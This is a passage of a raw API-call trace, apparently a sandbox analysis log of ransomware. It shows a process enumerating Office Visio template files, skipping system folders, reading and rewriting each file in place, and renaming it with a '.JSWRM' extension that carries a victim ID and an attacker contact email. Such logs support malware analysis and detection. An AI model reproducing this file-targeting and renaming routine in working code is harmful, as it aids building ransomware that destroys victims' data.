lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0147.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMAIN_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemain_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.965] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=39003) returned 1 [0147.965] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9850) returned 0x27b348 [0147.966] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x9850, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x9850, lpOverlapped=0x0) returned 1 [0147.970] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.970] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x9850, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x9850, lpOverlapped=0x0) returned 1 [0147.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0147.971] CloseHandle (hObject=0x314) returned 1 [0147.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0147.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0147.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0147.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0147.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0147.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0147.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0147.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0147.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0147.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0147.972] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMAIN_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemain_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMAIN_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemain_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0147.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0147.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0147.973] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3d4ec4f, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3d4ec4f, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3d4ec4f, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x94f4, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEMAIN_U.VSSX", cAlternateFileName="EEMAIN~2.VSS")) returned 1 [0147.973] lstrcmpiW (lpString1="EEMAIN_U.VSSX", lpString2=".") returned 1 [0147.973] lstrcmpiW (lpString1="EEMAIN_U.VSSX", lpString2="..") returned 1 [0147.973] lstrcmpiW (lpString1="EEMAIN_U.VSSX", lpString2="...") returned 1 [0147.973] lstrcmpiW (lpString1="EEMAIN_U.VSSX", lpString2="windows") returned -1 [0147.973] lstrcmpiW (lpString1="EEMAIN_U.VSSX", lpString2="recovery") returned -1 [0147.973] lstrcmpiW (lpString1="EEMAIN_U.VSSX", lpString2="perflogs") returned -1 [0147.973] lstrcmpiW (lpString1="EEMAIN_U.VSSX", lpString2="documents and settings") returned 1 [0147.973] lstrcmpiW (lpString1="EEMAIN_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.973] lstrcmpiW (lpString1="EEMAIN_U.VSSX", lpString2="system volume information") returned -1 [0147.973] lstrcmpiW (lpString1="EEMAIN_U.VSSX", lpString2="msocache") returned -1 [0147.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0147.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAIN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAIN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEMAIN_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0147.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0147.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAIN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAIN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEMAIN_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0147.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0147.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0147.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0147.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMAIN_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemain_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.974] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=38132) returned 1 [0147.975] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x94f0) returned 0x27b348 [0147.975] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x94f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x94f0, lpOverlapped=0x0) returned 1 [0147.979] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.979] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x94f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x94f0, lpOverlapped=0x0) returned 1 [0147.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0147.980] CloseHandle (hObject=0x314) returned 1 [0147.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0147.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0147.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0147.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0147.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0147.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0147.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0147.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0147.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0147.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0147.980] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMAIN_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemain_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMAIN_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemain_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0147.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0147.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0147.981] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x318928f, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x318928f, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x318928f, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1ad74, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEMAPS_M.VSSX", cAlternateFileName="EEMAPS~1.VSS")) returned 1 [0147.981] lstrcmpiW (lpString1="EEMAPS_M.VSSX", lpString2=".") returned 1 [0147.981] lstrcmpiW (lpString1="EEMAPS_M.VSSX", lpString2="..") returned 1 [0147.982] lstrcmpiW (lpString1="EEMAPS_M.VSSX", lpString2="...") returned 1 [0147.982] lstrcmpiW (lpString1="EEMAPS_M.VSSX", lpString2="windows") returned -1 [0147.982] lstrcmpiW (lpString1="EEMAPS_M.VSSX", lpString2="recovery") returned -1 [0147.982] lstrcmpiW (lpString1="EEMAPS_M.VSSX", lpString2="perflogs") returned -1 [0147.982] lstrcmpiW (lpString1="EEMAPS_M.VSSX", lpString2="documents and settings") returned 1 [0147.982] lstrcmpiW (lpString1="EEMAPS_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.982] lstrcmpiW (lpString1="EEMAPS_M.VSSX", lpString2="system volume information") returned -1 [0147.982] lstrcmpiW (lpString1="EEMAPS_M.VSSX", lpString2="msocache") returned -1 [0147.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0147.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAPS_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAPS_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEMAPS_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0147.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0147.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAPS_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAPS_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEMAPS_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0147.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0147.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0147.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0147.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMAPS_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemaps_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.983] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=109940) returned 1 [0147.983] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ad70) returned 0x2501e8 [0147.984] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1ad70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x1ad70, lpOverlapped=0x0) returned 1 [0147.993] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.993] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1ad70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x1ad70, lpOverlapped=0x0) returned 1 [0147.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0147.994] CloseHandle (hObject=0x314) returned 1 [0147.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0147.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0147.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0147.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0147.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0147.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0147.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0147.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0147.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0147.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0147.994] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMAPS_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemaps_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMAPS_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemaps_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0147.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0147.995] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0147.995] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3bd14ac, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3bd14ac, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3bd14ac, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1918f, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEMAPS_U.VSSX", cAlternateFileName="EEMAPS~2.VSS")) returned 1 [0147.996] lstrcmpiW (lpString1="EEMAPS_U.VSSX", lpString2=".") returned 1 [0147.996] lstrcmpiW (lpString1="EEMAPS_U.VSSX", lpString2="..") returned 1 [0147.996] lstrcmpiW (lpString1="EEMAPS_U.VSSX", lpString2="...") returned 1 [0147.996] lstrcmpiW (lpString1="EEMAPS_U.VSSX", lpString2="windows") returned -1 [0147.996] lstrcmpiW (lpString1="EEMAPS_U.VSSX", lpString2="recovery") returned -1 [0147.996] lstrcmpiW (lpString1="EEMAPS_U.VSSX", lpString2="perflogs") returned -1 [0147.996] lstrcmpiW (lpString1="EEMAPS_U.VSSX", lpString2="documents and settings") returned 1 [0147.996] lstrcmpiW (lpString1="EEMAPS_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.996] lstrcmpiW (lpString1="EEMAPS_U.VSSX", lpString2="system volume information") returned -1 [0147.996] lstrcmpiW (lpString1="EEMAPS_U.VSSX", lpString2="msocache") returned -1 [0147.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0147.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAPS_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAPS_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEMAPS_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0147.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0147.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAPS_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMAPS_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEMAPS_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0147.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0147.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0147.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0147.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMAPS_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemaps_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.997] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=102799) returned 1 [0147.997] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19180) returned 0x2501e8 [0147.998] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x19180, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x19180, lpOverlapped=0x0) returned 1 [0148.006] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.006] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x19180, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x19180, 